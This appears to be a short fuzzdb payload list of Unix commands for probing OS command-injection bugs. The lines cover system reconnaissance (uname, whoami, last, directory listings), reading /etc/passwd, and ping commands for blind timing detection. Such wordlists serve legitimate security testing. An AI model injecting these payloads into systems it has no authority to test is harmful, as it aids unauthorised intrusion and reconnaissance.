fuzzdb/attack-payloads/os-cmd-execution/commands-unix.txt
2010-04-17 21:32:31 +00:00

11 lines
204 B
Text

# list of potentially useful unix commands to fuzz inside an os command execution bug
uname -n -s
whoami
pwd
last
cat /etc/passwd
ls -la /tmp
ls -la /home
ping -i 30 127.0.0.1
ping 127.0.0.1
ping -n 30